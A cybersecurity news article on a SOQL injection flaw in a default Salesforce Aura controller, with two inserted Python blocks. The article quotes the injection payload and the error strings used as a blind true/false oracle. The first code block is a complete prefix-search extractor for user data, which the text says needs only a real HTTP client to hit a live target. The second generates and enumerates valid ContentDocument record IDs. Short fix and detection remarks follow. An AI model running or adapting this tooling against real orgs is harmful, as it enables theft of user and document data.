Critical SOQL Injection 0-Day Vulnerability in Salesforce Affects Millions Worldwide

A critical zero-day vulnerability in a controller that ships by default with Salesforce left millions of user records across thousands of deployments worldwide open to extraction.
The flaw, found in the built-in Aura controller action aura://CsvDataImportResourceFamilyController/ACTION$getCsvAutoMap, allowed attackers to pull user details and document metadata out of an org through SOQL injection.
SOQL Injection 0-Day Vulnerability
The vulnerability was discovered during automated fuzzing of the Aura controllers present in Salesforce deployments.
A custom parser and fuzzer were developed to test hundreds of endpoints by mutating input parameters; the application's app.js file conveniently lists each controller descriptor together with the arguments it expects, so the fuzzer could be driven straight from it.
According to security researcher Tobia Righi, the breakthrough came when the fuzzer returned an unexpected error message revealing unsafe parameter handling: "MALFORMED_QUERY: \nContentVersion WHERE ContentDocumentId = ''\n ERROR at Row:1:Column:239\nunexpected token: ''".
The error showed that the contentDocumentId parameter was being concatenated directly into a SOQL query string rather than passed as a bind variable or escaped, which is exactly the condition an injection needs.
SOQL is far more constrained than SQL: it has no UNION, no stacked statements and no comment syntax, so most of the classic SQL injection playbook does not transfer. The researcher nevertheless built a working exploit using an error-based blind technique.
The attack relies on the server answering a query that matches rows differently from one that matches nothing, and uses that discrepancy as a yes/no oracle to pull data out of the database one question at a time.
By sending payloads such as 069TP00000HbJbNYAV' AND OwnerId IN (SELECT Id FROM User WHERE Email LIKE 'a%25') AND ContentDocumentId != ' (where %25 is the URL-encoded % wildcard and the trailing fragment absorbs the closing quote the controller appends), attackers could enumerate, prefix by prefix, the contents of columns on any object related to ContentDocument.
The technique keyed on two distinguishable responses: when the injected subquery matched at least one row the server returned the Java error text "Cannot invoke "common.udd.EntityInfo.getEntityId()" because "ei" is null", and when it matched nothing it returned "Error in retrieving content document".
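The oracle described above, worked through offline as an added example. This is not the researcher's tooling and not Salesforce code: the Aura endpoint is replaced by a constructed stand-in (`fake_controller`) that reproduces only the behaviour the article reports, namely that the parameter is spliced into the SOQL string and that a matching subquery yields one error text while a non-matching one yields the other. The sample user rows, the `Email` column and the `send` callable are assumptions for the offline run.

```python
import re
import string

# Constructed sample rows standing in for the User object (assumption: the
# real org's data is unknown; these are invented for the offline run).
FAKE_USERS = ["alice@example.com", "amir@example.com", "bob@example.com"]

# The two responses the article reports. The first is what a matching
# subquery produced; the second what a non-matching one produced.
TRUE_RESPONSE = ('Cannot invoke "common.udd.EntityInfo.getEntityId()" '
                 'because "ei" is null')
FALSE_RESPONSE = "Error in retrieving content document"

# Characters tried at each position. '_' and '%' are LIKE wildcards and would
# need a backslash escape in SOQL, so they are left out of the alphabet.
ALPHABET = string.ascii_lowercase + string.digits + "@.-+"


def build_payload(document_id: str, column: str, pattern: str) -> str:
    """Reproduce the shape of the article's payload: close the quoted ID,
    add a subquery on a column of User, and end with an open quote so the
    controller's own trailing quote closes it. `pattern` is a raw LIKE
    pattern; on the wire the '%' is URL-encoded as '%25'."""
    return (f"{document_id}' AND OwnerId IN (SELECT Id FROM User WHERE "
            f"{column} LIKE '{pattern}') AND ContentDocumentId != '")


def fake_controller(content_document_id: str) -> str:
    """Constructed stand-in for the vulnerable controller (not Salesforce
    code). It splices the parameter into the query exactly as the article
    describes, then answers with the error string a matching or
    non-matching subquery produced."""
    soql = ("SELECT Id FROM ContentVersion WHERE ContentDocumentId = '"
            + content_document_id + "'")
    m = re.search(r"LIKE '([^']*)'", soql)
    if m is None:                      # no subquery injected: plain miss
        return FALSE_RESPONSE
    pattern = m.group(1)
    if pattern.endswith("%"):
        hit = any(u.startswith(pattern[:-1]) for u in FAKE_USERS)
    else:
        hit = pattern in FAKE_USERS
    return TRUE_RESPONSE if hit else FALSE_RESPONSE


def oracle(send, document_id: str, column: str, pattern: str) -> bool:
    """One yes/no question: does any User row match `pattern` on `column`?
    `send` is whatever delivers the payload and returns the response body;
    here it is the stand-in, in practice it would be an HTTP client."""
    return send(build_payload(document_id, column, pattern)) == TRUE_RESPONSE


def extract_values(send, document_id: str, column: str) -> list[str]:
    """Recover every distinct value of `column` by depth-first prefix search.
    A prefix is only extended while some row still starts with it, so the
    cost is roughly len(value) * len(ALPHABET) requests per value, and an
    exact-match probe catches values that are prefixes of longer ones."""
    found, stack = [], [""]
    while stack:
        prefix = stack.pop()
        if prefix and oracle(send, document_id, column, prefix):
            found.append(prefix)
        for ch in ALPHABET:
            if oracle(send, document_id, column, prefix + ch + "%"):
                stack.append(prefix + ch)
    return sorted(found)


if __name__ == "__main__":
    doc = "069TP00000HbJbNYAV"       # the ContentDocument ID from the article
    print(extract_values(fake_controller, doc, "Email"))
```

Swapping `fake_controller` for a real client is the only change needed to run the same search against a live target; everything else is the oracle logic. On the Apex side the fix is equally mechanical: pass the parameter as a bind variable (`WHERE ContentDocumentId = :docId`) or run it through `String.escapeSingleQuotes` before building dynamic SOQL.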
The researcher then scaled the attack with existing scripts that generate valid Salesforce record IDs, producing thousands of candidate contentDocumentId values carrying the 069 key prefix that Salesforce assigns to ContentDocument records.
Feeding those IDs through the same oracle allowed systematic extraction of document names, descriptions and owner details from both public and private ContentDocument objects.
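How such ID generation works, as an added example that is not the scripts the article refers to. The checksum rule for the 18-character form is the documented one and is checked against the ID the article itself shows; the base-62 digit ordering for the sequence part and the assumption that nearby records get adjacent sequence numbers are assumptions made here for the enumeration step.

```python
import string

# Digit ordering assumed for the sequential part of an ID (0-9, A-Z, a-z);
# the checksum alphabet is the documented one: A-Z then 0-5.
BASE62 = string.digits + string.ascii_uppercase + string.ascii_lowercase
CHECKSUM_ALPHABET = string.ascii_uppercase + "012345"


def checksum_suffix(id15: str) -> str:
    """Return the 3-character suffix that turns a 15-character, case-sensitive
    Salesforce ID into its 18-character case-insensitive form. Each 5-character
    chunk yields one character: bit i is set when chunk[i] is uppercase, and
    the resulting 0..31 indexes A-Z then 0-5."""
    if len(id15) != 15:
        raise ValueError("expected a 15-character ID")
    out = []
    for start in (0, 5, 10):
        chunk = id15[start:start + 5]
        value = sum(1 << i for i, ch in enumerate(chunk) if ch.isupper())
        out.append(CHECKSUM_ALPHABET[value])
    return "".join(out)


def to_18(id15: str) -> str:
    return id15 + checksum_suffix(id15)


def is_valid_18(id18: str) -> bool:
    """True when the suffix is consistent with the first 15 characters; a
    cheap filter before spending a request on a guessed ID."""
    return len(id18) == 18 and checksum_suffix(id18[:15]) == id18[15:]


def key_prefix(record_id: str) -> str:
    """The first three characters name the object type; 069 is ContentDocument."""
    return record_id[:3]


def neighbours(id18: str, span: int) -> list[str]:
    """Candidate IDs whose 9-character sequence part lies within +/- span of
    the given ID, excluding the ID itself. Assumes (not stated on the page)
    that records created close together receive adjacent sequence numbers,
    which is what lets a handful of known IDs seed thousands of guesses."""
    id15 = id18[:15]
    head, seq = id15[:6], id15[6:]          # prefix+pod+reserved, then sequence
    n = 0
    for ch in seq:
        n = n * 62 + BASE62.index(ch)
    result = []
    for k in range(-span, span + 1):
        v = n + k
        if k == 0 or v < 0 or v >= 62 ** 9:
            continue
        digits = ""
        for _ in range(9):
            v, r = divmod(v, 62)
            digits = BASE62[r] + digits
        result.append(to_18(head + digits))
    return result


if __name__ == "__main__":
    known = "069TP00000HbJbNYAV"   # the ID shown in the article
    print(checksum_suffix(known[:15]), is_valid_18(known))
    print(neighbours(known, 2))
```

The checksum is why guessing IDs is cheap: the last three characters add no entropy, and an attacker who holds one real ContentDocument ID can walk the sequence part in both directions and submit only candidates that pass `is_valid_18`. The same property is useful defensively, since a burst of requests carrying well-formed but non-existent 069 IDs is a recognisable enumeration pattern.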
Patch Released
After reporting the vulnerability to an affected organization, the researcher learned that the vulnerable controller was actually part of Salesforce’s default installation, not custom code.
When the issue was then reported to Salesforce in late February 2025, the company patched it quietly, without a public advisory, a CVE identifier or a mention in release notes.
The vulnerability’s impact extends far beyond individual organizations, as the affected controller was present in all Salesforce deployments by default.
Silent patching removed the immediate risk, but it has left the security community without official guidance on how to detect past exploitation or what indicators of compromise to look for across the window in which the flaw was live.
The post Critical SOQL Injection 0-Day Vulnerability in Salesforce Affects Millions Worldwide appeared first on Cyber Security News.